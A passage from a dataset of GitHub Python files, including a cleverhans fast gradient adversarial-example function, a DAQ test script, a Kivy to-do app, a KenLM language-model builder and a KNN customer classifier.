Is the attack targeted or untargeted?\n Untargeted, the default, will try to make the label incorrect.\n Targeted will instead try to move in the direction of being more like y.\n :return: a tensor for the adversarial example\n \"\"\"\n if norm not in [np.inf, 2]:\n raise ValueError(\"Norm order must be either np.inf or 2.\")\n\n if y is None:\n # Using model predictions as ground truth to avoid label leaking\n x_labels = np.argmax(model_fn(x), 1)\n y = one_hot(x_labels, 10)\n\n def loss_adv(image, label):\n pred = model_fn(image[None])\n loss = -np.sum(logsoftmax(pred) * label)\n if targeted:\n loss = -loss\n return loss\n\n grads_fn = vmap(grad(loss_adv), in_axes=(0, 0), out_axes=0)\n grads = grads_fn(x, y)\n\n axis = list(range(1, len(grads.shape)))\n avoid_zero_div = 1e-12\n if norm == np.inf:\n perturbation = eps * np.sign(grads)\n elif norm == 1:\n raise NotImplementedError(\"L_1 norm has not been implemented yet.\")\n elif norm == 2:\n square = np.maximum(\n avoid_zero_div, np.sum(np.square(grads), axis=axis, keepdims=True)\n )\n perturbation = grads / np.sqrt(square)\n\n adv_x = x + perturbation\n\n # If clipping is needed, reset all values outside of [clip_min, clip_max]\n if (clip_min is not None) or (clip_max is not None):\n # We don't currently support one-sided clipping\n assert clip_min is not None and clip_max is not None\n adv_x = np.clip(adv_x, a_min=clip_min, a_max=clip_max)\n\n return adv_x\n","repo_name":"cleverhans-lab/cleverhans","sub_path":"cleverhans/jax/attacks/fast_gradient_method.py","file_name":"fast_gradient_method.py","file_ext":"py","file_size_in_byte":3050,"program_lang":"python","lang":"en","doc_type":"code","stars":5963,"dataset":"github-code","pt":"7"} +{"seq_id":"71451314463","text":"import math\nimport pydaq\nimport logging\nimport argparse\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef _init_logger(level, logfile=None):\n log_handlers = [logging.StreamHandler()]\n if logfile is not None:\n file_format = logging.Formatter('[ %(asctime)s | %(levelname)-8s] %(message)s')\n file_handler = logging.FileHandler(logfile)\n file_handler.setFormatter(file_format)\n log_handlers.append(file_handler)\n log_level = getattr(logging, level.upper(), logging.INFO)\n logging.basicConfig(format='%(message)s', level=log_level, handlers=log_handlers)\n\n\ndef _parse_duration(duration):\n nsec, sec = math.modf(duration)\n return [int(sec), int(nsec*1e9)]\n\n\ndef main(host, platform, nruns, duration, ncalib):\n logger.info('Running with configuration: nruns %d, duration %.1f s, ncalib %d', nruns, duration, ncalib)\n logger.info('Connecting to daq control running on %s with platform %d', host, platform)\n try:\n daq = pydaq.Control(host, platform)\n for n in range(nruns):\n logger.info(\"Started run %d\", n)\n logger.debug(\"Calling daq configure with events=0\")\n daq.configure(events=0)\n for c in range(ncalib):\n logger.info(\"Started calibcycle %d\", c)\n duration_s, duration_ns = _parse_duration(duration)\n logger.debug(\"Calling daq begin with duration=[%d,%d]\", duration_s, duration_ns)\n daq.begin(duration=[duration_s, duration_ns])\n logger.debug(\"Waiting for daq to finish running\")\n daq.wait()\n logger.info(\"Ended calibcycle %d\", c)\n logger.debug(\"Calling daq endrun\")\n daq.endrun()\n logger.info(\"Ended run %d\", n) \n finally:\n logger.info('Disconnecting from the daq')\n daq.disconnect()\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=\"Simple script for exercising the daq\")\n\n parser.add_argument(\n \"-a\",\n 
\"--address\",\n dest=\"host\",\n default='localhost',\n help=\"connect to DAQ at HOST\"\n )\n\n parser.add_argument(\n \"-p\",\n \"--platform\",\n dest=\"platform\",\n type=int,\n default=0,\n help=\"connect to DAQ at PLATFORM\"\n )\n\n parser.add_argument(\n '--log-level',\n default='INFO',\n help='the logging level of the application (default INFO)'\n )\n\n parser.add_argument(\n '--log-file',\n help='an optional file to write the log output to'\n )\n\n parser.add_argument(\n 'nruns',\n type=int,\n metavar=\"NRUNS\",\n help=\"the number of runs\"\n )\n\n parser.add_argument(\n 'duration',\n type=float,\n metavar=\"DURATION\",\n default=30.0,\n nargs='?',\n help=\"the duration (in secs) of each calib cycle (default: 30 s)\"\n )\n\n parser.add_argument(\n 'ncalib',\n type=int,\n metavar=\"NCALIB\",\n default=1,\n nargs='?',\n help=\"the number of calib cycles to use (default: 1)\"\n )\n\n args = parser.parse_args()\n\n # set up the logger\n _init_logger(args.log_level, args.log_file)\n\n try:\n main(args.host, args.platform, args.nruns, args.duration, args.ncalib)\n except KeyboardInterrupt:\n pass\n","repo_name":"lcls-daq/tools","sub_path":"scanning/fitness_test.py","file_name":"fitness_test.py","file_ext":"py","file_size_in_byte":3456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"74617555424","text":"from kivy.app import App\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.label import Label\nfrom kivy.uix.image import Image\nfrom kivy.uix.behaviors import ButtonBehavior\nfrom kivy.properties import ObjectProperty\nfrom kivy.storage.jsonstore import JsonStore\nfrom kivy.core.window import Window\n\nfrom kivymd.theming import ThemeManager\nfrom kivymd.label import MDLabel\n\nimport datetime\nimport locale\n\n#Window.size = (480, 853)\n\nfrom kivy.config import Config\nConfig.set('kivy', 'keyboard_mode', 'systemanddock')\n\nclass ItemLabel(Label):\n pass\n \nclass ClickableImage(Image, ButtonBehavior):\n pass\n \n \n\nclass Container(BoxLayout):\n \n stored_data = ObjectProperty(None)\n\n def __init__(self, *args, **kwargs):\n super(BoxLayout, self).__init__(*args, **kwargs)\n self.stored_data = JsonStore('data.json')\n for item_key in self.stored_data.keys():\n item = self.stored_data.get(item_key)\n self.addtodoClick(item['text'], item['done'])\n \n\n def addtodoClick(self, text, done=0):\n lab = ItemLabel(text=\"[ref=l]{}[/ref]\".format(text))\n if done:\n lab.text = \"[s]{}[/s]\".format(lab.text)\n lab.color = (0.5, 0.5, 0.5, 1)\n lab.font_size = '40sp'\n \n lab.bind(on_ref_press=self.LabelClickHandler)\n lab.children[0].bind(on_touch_down=self.delClick)\n \n self.ids['todolist'].add_widget(lab)\n \n \n def delClick (self, image, touch):\n if image.collide_point(*touch.pos):\n #print(image.size)\n image.parent.parent.remove_widget(image.parent)\n \n\n def LabelClickHandler(self, *args):\n lab = args[0]\n text = lab.text\n if text.find('[s]')>=0:\n text = text.replace('[s]', '').replace('[/s]', '')\n lab.color = (1, 1, 1, 1)\n else:\n text = \"[s]{}[/s]\".format(text)\n lab.color = (0.5, 0.5, 0.5, 1)\n lab.text = text\n \n \n \n def clearTodos(self):\n #print(self.ids['todolist'].children)\n gl = self.ids['todolist']\n #for lab in gl.children:\n while gl.children:\n lab = gl.children[0]\n #print(lab.text)\n gl.remove_widget(lab)\n \n\nclass ToDoApp(App):\n theme_cls = ThemeManager()\n locale.setlocale(locale.LC_TIME, 'ru')\n today = datetime.datetime.today().strftime(\"%A, 
%d.%m.%Y\").encode('latin-1').decode('cp1251') # Finish\n title = 'Привет. Сегодня ' + today #time.strftime(\"%a %b %d %H:%M:%S %Y\")\n \n def on_close(self, *args):\n key = 0\n self.root.stored_data.clear()\n for lab in self.root.ids['todolist'].children:\n self.root.stored_data.put(key, done=1 if \"[s]\" in lab.text else 0, \\\n text=lab.text.replace(\"[s]\", \"\").replace(\"[/s]\", \"\").replace(\"[ref=l]\", \"\").replace(\"[/ref]\", \"\")) \n key += 1\n\n return True \n\n def build(self):\n Window.bind(on_close=self.on_close)\n self.theme_cls.theme_style = 'Dark'\n c = Container()\n return c \n \n\n\nif __name__ == \"__main__\":\n ToDoApp().run() \n","repo_name":"igorvereshchak/todoapp","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"38685365353","text":"import tkinter as tk \nimport tkinter.ttk as ttk\n\nfrom .FileSelecter import FileSelecter\nfrom .ParameterViewA import ParameterViewA\nfrom .ParameterViewB import ParameterViewB\nfrom .Plot import Plot\nfrom .SelectStations import SelectStationsWindow \n\nfrom .InterfaceState import InterfaceState\nfrom ..io import load_src_posn\n\nfrom ..visualisation import plot_residuals\nfrom ..calc import *\n\nclass MainWindow(tk.Tk):\n \"\"\"Main application class for the helmert transfrom interface\"\"\"\n\n file_formats = [\"\"]\n \n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n \n #Misc configuration\n self.title(\"Icrf Tool\")\n design_mode = False \n\n #Data\n self.df_from = None\n self.df_to = None\n self.stations = None\n self.transformed = None \n\n self.state = InterfaceState(self)\n\n #Tkinter widgets\n self.title_label = tk.Label(self, text = \"Icrf Tool\", font=(\"Helvetica\", 16))\n\n self.data_frame = tk.Frame(self)\n self.from_file_selecter_label = ttk.Label(self.data_frame, text=\"Transform from:\")\n self.from_file_selecter = FileSelecter(self.data_frame, self.state.transform.from_file_path, self.state.transform.from_epoch, self.file_formats)\n self.to_file_selecter_label = ttk.Label(self.data_frame, text=\"Transform to:\")\n self.to_file_selecter = FileSelecter(self.data_frame, self.state.transform.to_file_path, self.state.transform.to_epoch, self.file_formats)\n self.select_stations_button = ttk.Button(self.data_frame, text=\"Select stations\", state = \"disable\")\n \n #self.line1 = ttk.Separator(self, orient = \"horizontal\")\n\n #self.config_frame = tk.Frame(self)\n self.weighted_button_label = ttk.Label(self.data_frame, text=\"Weighted\")\n self.weighted_button = ttk.Checkbutton(self.data_frame, variable=self.state.transform.weighted, onvalue=True, offvalue=False)\n \n self.transform_type_combo_label = ttk.Label(self.data_frame, text=\"Transform type\")\n self.transform_type_combo = ttk.Combobox(self.data_frame, textvariable=self.state.transform.type, values = ['A', 'B'], width=3)\n \n self.calculate_button = ttk.Button(self.data_frame, text = \"Calculate parameter\", state = \"disable\")\n self.transform_button = ttk.Button(self.data_frame, text = \"Plot residuals\", state = \"disable\")\n self.reset_button = ttk.Button(self.data_frame, text = \"Reset parameters\")\n \n #self.line2 = ttk.Separator(self, orient = \"horizontal\")\n\n self.parameter_frame = tk.Frame(self)\n self.parameter_view = ParameterViewA(self.parameter_frame)\n \n self.chi2_label = ttk.Label(self.parameter_frame, text = \"Chi squared: \")\n self.chi_2_value = 
ttk.Label(self.parameter_frame, textvariable = self.state.transform.chi_squared) \n self.wrms_label = ttk.Label(self.parameter_frame, text = \"Weighted root mean squared: \")\n self.wrms_value = ttk.Label(self.parameter_frame, textvariable=self.state.transform.weighted_root_mean_squared)\n\n self.plot_frame = tk.Frame(self)\n self.plot = Plot(self.plot_frame, 1, 1) \n #self.plot.fig.subplots_adjust(left=0.1, right=0.9, bottom=0.1, top=0.9, wspace=0.1, hspace=0.1)\n self.plot.fig.tight_layout(pad=1)\n\n #Place Tkinter widgets\n\n self.rowconfigure(0, weight=0)\n self.rowconfigure(1, weight=0)\n self.rowconfigure(2, weight=1)\n\n self.columnconfigure(0, weight = 0)\n self.columnconfigure(1, weight = 1)\n\n self.title_label.grid(row = 0, column=0, sticky=\"w\", padx=30, pady=20)\n\n self.data_frame.grid(row=1, column=0, padx=30, sticky = \"news\")\n self.from_file_selecter_label.grid(row=0, column=0, sticky=\"nw\")\n self.from_file_selecter.grid(row=1, column=0, sticky=\"ew\", pady=4, columnspan=6)\n self.to_file_selecter_label.grid(row=2, column=0, sticky=\"nw\")\n self.to_file_selecter.grid(row=3, column=0, sticky=\"ew\", pady=4, columnspan=6)\n #self.select_stations_button.grid(row=4, column=0, sticky = \"w\", pady=10)\n\n #self.line1.grid(row=4, column=0, sticky=\"ew\")\n\n #self.config_frame.grid(row=6, column=0, padx=10, pady=10)\n self.weighted_button_label.grid(row=5, column=0)\n self.weighted_button.grid(row=6, column=0)\n\n self.transform_type_combo_label.grid(row=5, column=1)\n self.transform_type_combo.grid(row=6, column=1)\n\n self.calculate_button.grid(row=6, column=2, sticky=\"w\")\n self.transform_button.grid(row=6, column=3, sticky=\"ew\")\n self.reset_button.grid(row=6, column=4, sticky=\"e\")\n\n #self.line2.grid(row=8, column=0, sticky=\"ew\")\n\n self.parameter_frame.grid(row=2, column=0, padx=30, pady=50, sticky=\"news\")\n self.parameter_view.grid(row=0, column=0, columnspan=4, pady=10, sticky=\"ew\")\n #self.chi2_label.grid(row=1, column=0, sticky=\"n\")\n #self.chi_2_value.grid(row=1, column=1, sticky=\"n\")\n #self.wrms_label.grid(row=1, column=2, sticky=\"n\")\n #self.wrms_value.grid(row=1, column=3, sticky=\"n\")\n\n self.plot_frame.grid(row=0, column=1, rowspan=3, sticky=\"news\")\n self.plot.pack(expand=True, fill='both')\n self.update_plot()\n \n #Bind actions\n self.state.transform.from_file_path.trace_add(\"write\", self.df_from_change)\n self.state.transform.to_file_path.trace_add(\"write\", self.df_to_change)\n self.select_stations_button.config(command = self.select_stations)\n\n self.state.transform.type.trace_add(\"write\", self.transformation_type_change)\n\n self.calculate_button.config(command = self.calculate_parameters)\n self.transform_button.config(command = self.update_transform)\n self.reset_button.config(command = self.reset_parameters)\n\n if design_mode:\n self.title_label.config(background=\"red\")\n self.parameter_frame.config(background=\"blue\")\n self.data_frame.config(background=\"red\")\n\n def transformation_type_change(self, *args):\n type = self.state.transform.type.get()\n self.parameter_view.destroy()\n \n if type == \"A\":\n self.parameter_view = ParameterViewA(self.parameter_frame)\n elif type == \"B\":\n self.parameter_view = ParameterViewB(self.parameter_frame)\n \n self.parameter_view.grid(row=0, column=0, columnspan=4, pady=10, sticky=\"ew\")\n\n def select_stations(self, *args):\n \"\"\"Open station selection window\"\"\"\n self.select_stations_window = SelectStationsWindow(self)\n\n def df_from_change(self, *args):\n 
\"\"\"Called on from_file change.\"\"\"\n if not self.state.transform.from_file_path.get()==\"\":\n self.df_from = load_src_posn(self.state.transform.from_file_path.get())\n self.set_stations()\n\n def df_to_change(self, *args):\n \"\"\"Called on to_file change.\"\"\"\n if not self.state.transform.to_file_path.get()==\"\":\n self.df_to = load_src_posn(self.state.transform.to_file_path.get())\n self.set_stations()\n\n def set_stations(self):\n \"\"\"Updates the station list as the intersection of stations\"\"\"\n self.select_stations_button.config(state = \"normal\")\n self.transform_button.config(state = \"normal\")\n self.calculate_button.config(state = \"normal\")\n # if not self.df_from is None and not self.df_to is None:\n # station_intersection = self.df_from.Station_Name.isin(self.df_to.Station_Name)\n # df_from = self.df_from[station_intersection]\n # df_to = self.df_to[station_intersection]\n\n # sigmas = np.sqrt(df_from.X_sigma**2 + df_from.Y_sigma**2 + df_from.Z_sigma**2 + df_to.X_sigma**2 + df_to.Y_sigma**2 + df_to.Z_sigma**2) \n # stations = df_from.Station_Name\n\n # self.stations = pd.DataFrame({\"Station_Name\" : stations, \"Sigma\" : sigmas, \"Selected\" : True})\n\n def calculate_parameters(self, *args):\n custom_dict = {}\n type = self.state.transform.type.get()\n \n if type == \"A\":\n for name, parameter in self.state.parameters_a.get_parameter_dict().items():\n if parameter.is_custom.get():\n custom_dict[name] = parameter.value.get()\n else:\n custom_dict[name] = None\n elif type == \"B\":\n for name, parameter in self.state.parameters_b.get_parameter_dict().items():\n if parameter.is_custom.get():\n custom_dict[name] = parameter.value.get()\n else:\n custom_dict[name] = None\n\n weighted = self.state.transform.weighted.get()\n\n df_from = self.df_from#[self.stations.Selected]\n df_to = self.df_to#[self.stations.Selected]\n\n value_dict, sigma_dict = calculate_parameters(df_from, df_to, weighted, custom_dict, type)\n\n if type == \"A\": \n for name, value in value_dict.items():\n self.state.parameters_a.values[name].set(value)\n\n for name, value in sigma_dict.items():\n self.state.parameters_a.sigmas[name].set(value)\n elif type==\"B\":\n for name, value in value_dict.items():\n self.state.parameters_b.values[name].set(value)\n\n for name, value in sigma_dict.items():\n self.state.parameters_b.sigmas[name].set(value)\n\n def update_transform(self, *args):\n self.calculate_transform()\n self.update_plot()\n self.update_statistics()\n\n def calculate_transform(self, *args):\n type = self.state.transform.type.get()\n if type == \"A\":\n parameter_dict = {name : var.get() for name, var in self.state.parameters_a.values.items()}\n elif type == \"B\":\n parameter_dict = {name : var.get() for name, var in self.state.parameters_b.values.items()}\n\n\n df_from = self.df_from\n df_to = self.df_to\n \n type = self.state.transform.type.get()\n\n self.transformed = icrf_transform(df_from, parameter_dict, type = type)\n self.transformed = calculate_residuals(self.transformed, df_to)\n\n def update_plot(self, *args):\n self.plot.clear()\n if not self.transformed is None:\n transformed = self.transformed\n else:\n transformed = None\n plot_residuals(transformed, self.plot.axes)\n self.plot.draw()\n\n def update_statistics(self):\n df_from = self.df_from#[self.stations.Selected]\n df_to = self.df_to#[self.stations.Selected]\n \n standared_errors = df_from.X_sigma**2 + df_from.Y_sigma**2 + df_from.Z_sigma**2 + df_to.X_sigma**2 + df_to.Y_sigma**2 + df_to.Z_sigma**2\n value = 
sum(self.transformed.dX ** 2 / standared_errors)\n \n #self.state.transform.chi_squared.set(self.value_to_string(value))\n #self.state.transform.weighted_root_mean_squared.set(self.value_to_string(value/sum(1/standared_errors)))\n\n def reset_parameters(self, *args):\n \"\"\"Reset all parameter values to zero\"\"\"\n type = self.state.transform.type.get()\n if type == \"A\":\n parameters = self.state.parameters_a.get_parameter_dict().values()\n if type == \"B\":\n parameters = self.state.parameters_b.get_parameter_dict().values()\n \n for parameter in parameters:\n parameter.value.set(0)\n if self.state.transform.weighted:\n parameter.sigma.set(0)\n else:\n #TODO: No value?\n parameter.sigma.set(0) \n \n def value_to_string(self, value):\n string = \"{:.4f}\".format(value)\n return string ","repo_name":"AdrianLundell/adrians-geotools","sub_path":"IcrfTool/interface/MainWindow.py","file_name":"MainWindow.py","file_ext":"py","file_size_in_byte":11745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"17378090412","text":"# -*- coding: utf-8 -*-\n\nimport time\nimport decorator\nfrom logtest import test_logger\nfrom logtest import _l\n\nmilli_time = (lambda x: int(round(x * 1000)))\n\n\ndef profiling(msg=None, records=None):\n def deco(func):\n def wrapper(func, *args, **kwargs):\n start = time.time()\n v = func(*args, **kwargs)\n end = time.time()\n\n test_obj = args[0]\n\n dict_float = {\n 'width': 10,\n 'prec': 3,\n }\n\n dict_info = {\n 'function_name': func.__name__,\n 'test_case': '{0}.{1}'.format(test_obj.__class__.__module__,\n test_obj.__class__.__name__),\n 'records': records,\n 'start': '{:{width}.{prec}f}'.format(start, **dict_float),\n 'end': '{:{width}.{prec}f}'.format(end, **dict_float),\n 'duration': '{:{width}.{prec}f}'.format(end - start,\n **dict_float),\n }\n if records is not None:\n _msg = '{function_name} - {records}: {duration} s'\n\n if msg is None:\n _msg = '{function_name} - {duration} s'\n else:\n _msg = msg\n\n test_logger.info(_l(_msg.format(**dict_info), **dict_info))\n\n return v\n\n return decorator.decorator(wrapper, func)\n\n return deco\n","repo_name":"arthuralvim/tutorial-sqlalchemy","sub_path":"tests/profiling.py","file_name":"profiling.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"12196811745","text":"#! 
/usr/bin/env python3\nimport argparse, os, gzip, io, bz2, tarfile, logging, subprocess\nfrom collections import Counter\nimport progressbar\nfrom listener import tokenizer\n\nlog = logging.getLogger(__name__)\n\n\ndef ds_tokenizer(line):\n \"\"\"Default upstream tokenizer\"\"\"\n return line.lower().split()\n\n\ndef convert_and_filter_topk(\n input_txt,\n output_dir=None,\n top_k=50000,\n tokenizer=ds_tokenizer,\n stop_after=None,\n filter_function=None,\n context='default',\n):\n \"\"\" Convert to lowercase, count word occurrences and save top-k words to a file \"\"\"\n\n counter = Counter()\n if output_dir is None:\n output_dir = os.path.dirname(os.path.abspath(input_txt))\n\n data_lower = os.path.join(\n output_dir, \"%(context)s-lower.txt.gz\" % {'context': context,}\n )\n\n print(\"\\nConverting to lowercase and counting word occurrences ...\")\n lines = 0\n with io.TextIOWrapper(\n io.BufferedWriter(gzip.open(data_lower, \"w+\")), encoding=\"utf-8\"\n ) as file_out:\n\n # Open the input file either from input.txt or input.txt.gz\n rest, file_extension = os.path.splitext(input_txt)\n if rest.endswith('.tar'):\n file_in = tarfile.open(input_txt, mode='r:gz')\n\n def iter_tar_lines():\n for member in file_in:\n if not member.isfile():\n continue\n try:\n for line in io.TextIOWrapper(\n file_in.extractfile(member), encoding='utf-8',\n ):\n yield line\n except UnicodeDecodeError as err:\n log.warning(\"Encoding for %s is not utf-8\", member.name)\n continue\n\n line_iterator = iter_tar_lines()\n else:\n if file_extension == \".gz\":\n file_in = io.TextIOWrapper(\n io.BufferedReader(gzip.open(input_txt)), encoding=\"utf-8\"\n )\n elif file_extension == \".bz2\":\n file_in = io.TextIOWrapper(\n io.BufferedReader(bz2.open(input_txt)), encoding=\"utf-8\"\n )\n else:\n file_in = open(input_txt, encoding=\"utf-8\")\n line_iterator = file_in\n\n for line in progressbar.progressbar(line_iterator):\n if filter_function and not filter_function(line):\n continue\n tokens = tokenizer(line)\n if tokens:\n counter.update(tokens)\n file_out.write(' '.join(tokens).lower() + '\\n')\n lines += 1\n if stop_after and lines > stop_after:\n break\n elif not lines % 10000:\n print(line)\n print(' '.join(tokens))\n\n file_in.close()\n\n # Save top-k words\n print(\"\\nSaving top {} words ...\".format(top_k))\n top_counter = counter.most_common(top_k)\n vocab_str = \"\\n\".join(word for word, count in top_counter)\n vocab_path = \"{}-vocab-{}.txt\".format(context, top_k)\n vocab_path = os.path.join(output_dir, vocab_path)\n with open(vocab_path, \"w+\") as file:\n file.write(vocab_str)\n\n print(\"\\nCalculating word statistics ...\")\n total_words = sum(counter.values())\n print(\" Your text file has {} words in total\".format(total_words))\n print(\" It has {} unique words\".format(len(counter)))\n top_words_sum = sum(count for word, count in top_counter)\n word_fraction = (top_words_sum / total_words) * 100\n print(\n \" Your top-{} words are {:.4f} percent of all words\".format(\n top_k, word_fraction\n )\n )\n print(' Your most common word \"{}\" occurred {} times'.format(*top_counter[0]))\n last_word, last_count = top_counter[-1]\n print(\n ' The least common word in your top-k is \"{}\" with {} times'.format(\n last_word, last_count\n )\n )\n for i, (w, c) in enumerate(reversed(top_counter)):\n if c > last_count:\n print(\n ' The first word with {} occurrences is \"{}\" at place {}'.format(\n c, w, len(top_counter) - 1 - i\n )\n )\n break\n\n return data_lower, vocab_str\n\n\ndef wikipedia_filter(line):\n 
if line == '---END.OF.DOCUMENT---':\n        return None\n    elif not line.strip():\n        return None\n    tokens = line.lower().split()\n    if len(tokens) < 4:  # skip titles, empty lines, etc\n        return None\n    return line\n\n\ndef wikipedia():\n    convert_and_filter_topk(\n        '/var/datasets/text/WestburyLab.Wikipedia.Corpus.txt.bz2',\n        tokenizer=create_dictation_tokenizer(),\n        filter_function=wikipedia_filter,\n    )\n\n\ndef upstream():\n    convert_and_filter_topk(\n        '/var/datasets/text/librispeech-lm-norm.txt.gz', tokenizer=ds_tokenizer,\n    )\n\n\ndef raw_python_corpus():\n    convert_and_filter_topk(\n        '/var/datasets/text/python-corpus.tar.gz',\n        tokenizer=create_dictation_tokenizer(code=True),\n        filter_function=None,\n    )\n\n\ndef create_dictation_tokenizer(code=False):\n    \"\"\"Create a tokenizer for dictation inputs\"\"\"\n\n    dictionary = tokenizer.default_dictionary()\n    # Return directly: rebinding the name 'tokenizer' here would make it a\n    # local variable, shadow the imported module, and raise UnboundLocalError\n    # on the line above.\n    return tokenizer.Tokenizer(dictionary, run_together_guessing=code)\n\n\ndef build_lm(args, data_lower, vocab_str):\n    print(\"\\nCreating ARPA file ...\")\n    lm_path = os.path.join(args.output_dir, \"lm.arpa\")\n    subargs = [\n        os.path.join(args.kenlm_bins, \"lmplz\"),\n        \"--order\",\n        str(args.arpa_order),\n        \"--temp_prefix\",\n        args.output_dir,\n        \"--memory\",\n        args.max_arpa_memory,\n        \"--text\",\n        data_lower,\n        \"--arpa\",\n        lm_path,\n        \"--prune\",\n        *args.arpa_prune.split(\"|\"),\n    ]\n    if args.discount_fallback:\n        subargs += [\"--discount_fallback\"]\n    subprocess.check_call(subargs)\n\n    # Filter LM using vocabulary of top-k words\n    print(\"\\nFiltering ARPA file using vocabulary of top-k words ...\")\n    filtered_path = os.path.join(args.output_dir, \"lm_filtered.arpa\")\n    subprocess.run(\n        [\n            os.path.join(args.kenlm_bins, \"filter\"),\n            \"single\",\n            \"model:{}\".format(lm_path),\n            filtered_path,\n        ],\n        input=vocab_str.encode(\"utf-8\"),\n        check=True,\n    )\n\n    # Quantize and produce trie binary.\n    print(\"\\nBuilding lm.binary ...\")\n    binary_path = os.path.join(args.output_dir, \"lm.binary\")\n    subprocess.check_call(\n        [\n            os.path.join(args.kenlm_bins, \"build_binary\"),\n            \"-a\",\n            str(args.binary_a_bits),\n            \"-q\",\n            str(args.binary_q_bits),\n            \"-v\",\n            args.binary_type,\n            filtered_path,\n            binary_path,\n        ]\n    )\n\n\ndef main():\n    from listener import defaults\n\n    parser = argparse.ArgumentParser(\n        description=\"Generate contextual language models for Listener\"\n    )\n    parser.add_argument(\n        '-c',\n        '--context',\n        help=\"Which context to process\",\n        choices=['code', 'wikipedia', 'upstream',],\n        default='code',\n    )\n\n    parser.add_argument(\n        \"--output_dir\",\n        help=\"Directory path for the output\",\n        type=str,\n        required=True,\n        default='/var/datasets/text',\n    )\n    parser.add_argument(\n        \"--top_k\",\n        help=\"Use top_k most frequent words for the vocab.txt file. These will be used to filter the ARPA file.\",\n        type=int,\n        required=True,\n    )\n    parser.add_argument(\n        \"--kenlm_bins\",\n        help=\"File path to the KENLM binaries lmplz, filter and build_binary\",\n        type=str,\n        required=True,\n    )\n    parser.add_argument(\n        \"--arpa_order\",\n        help=\"Order of k-grams in ARPA-file generation\",\n        type=int,\n        required=True,\n    )\n    parser.add_argument(\n        \"--max_arpa_memory\",\n        help=\"Maximum allowed memory usage for ARPA-file generation\",\n        type=str,\n        required=True,\n    )\n    parser.add_argument(\n        \"--arpa_prune\",\n        help=\"ARPA pruning parameters. 
Separate values with '|'\",\n type=str,\n required=True,\n )\n parser.add_argument(\n \"--binary_a_bits\",\n help=\"Build binary quantization value a in bits\",\n type=int,\n required=True,\n )\n parser.add_argument(\n \"--binary_q_bits\",\n help=\"Build binary quantization value q in bits\",\n type=int,\n required=True,\n )\n parser.add_argument(\n \"--binary_type\",\n help=\"Build binary data structure type\",\n type=str,\n required=True,\n )\n parser.add_argument(\n \"--discount_fallback\",\n help=\"To try when such message is returned by kenlm: 'Could not calculate Kneser-Ney discounts [...] rerun with --discount_fallback'\",\n action=\"store_true\",\n )\n\n args = parser.parse_args()\n\n data_lower, vocab_str = convert_and_filter_topk(args)\n build_lm(args, data_lower, vocab_str)\n\n # Delete intermediate files\n # os.remove(os.path.join(args.output_dir, \"lower.txt.gz\"))\n # os.remove(os.path.join(args.output_dir, \"lm.arpa\"))\n # os.remove(os.path.join(args.output_dir, \"lm_filtered.arpa\"))\n","repo_name":"mcfletch/listener2_lm","sub_path":"listener2_lm/ds_genlm.py","file_name":"ds_genlm.py","file_ext":"py","file_size_in_byte":9245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"16891095840","text":"'''$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$\r\n K-Nearest Neighbors\r\n Auther:-Dhairy Kataria\r\n$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$'''\r\n#Importing the Libraries\r\nimport numpy as np\r\nimport pandas as pd\r\nimport seaborn as sns\r\n\r\n#Load Data From CSV File\r\ndf = pd.read_csv('teleCust1000t.csv')\r\ndf.info() #Seeing if there is any null value present\r\n\r\nsns.countplot(df['custcat']) #VLet’s see how many of each class is in our data set\r\n\r\n\r\nsns.countplot(x='custcat',hue='retire',data=df)\r\n\r\ndf.drop(['retire', 'gender'], axis=1)\r\n#setting the independent and dependent variable\r\nX = df.iloc[ : , 0:9].values\r\ny = df['custcat'].values\r\n\r\n\r\n#Data Standardization give data zero mean and unit variance, it is good practice, \r\n#especially for algorithms such as KNN which is based on distance of cases:\r\nfrom sklearn import preprocessing\r\nX = preprocessing.StandardScaler().fit(X).transform(X.astype(float))\r\n\r\n#Splitting data into Training set and Test set\r\nfrom sklearn.model_selection import train_test_split\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.25, random_state = 1)\r\n\r\n#finding the best value of k for which the accuracy is maximum \r\nfrom sklearn.metrics import accuracy_score\r\nma = 0\r\n\r\nfor k in range (1,15):\r\n from sklearn.neighbors import KNeighborsClassifier\r\n neigh = KNeighborsClassifier( algorithm='auto', p=2, n_neighbors=k).fit(X_train, y_train)\r\n y_pred = neigh.predict(X_test)\r\n accuracy = accuracy_score(y_test, y_pred)\r\n \r\n if(accuracy > ma):\r\n ma = accuracy\r\n\r\nprint(ma)","repo_name":"dhairyakataria/MachineLeaning-KNearestNeighbour","sub_path":"telecom_customer(KNN).py","file_name":"telecom_customer(KNN).py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"8682523181","text":"class Solution:\r\n def minimumBuckets(self,N, arr):\r\n gcd = arr[0]\r\n sum = arr[0]\r\n for i in range(1, N):\r\n gcd = self.computeGCD(gcd, arr[i])\r\n sum += arr[i]\r\n return int(sum / gcd)\r\n\r\n def computeGCD(self, x, y):\r\n while y:\r\n x, y = y, x % y\r\n return abs(x)\r\n\r\n\r\nclass IntArray:\r\n def 
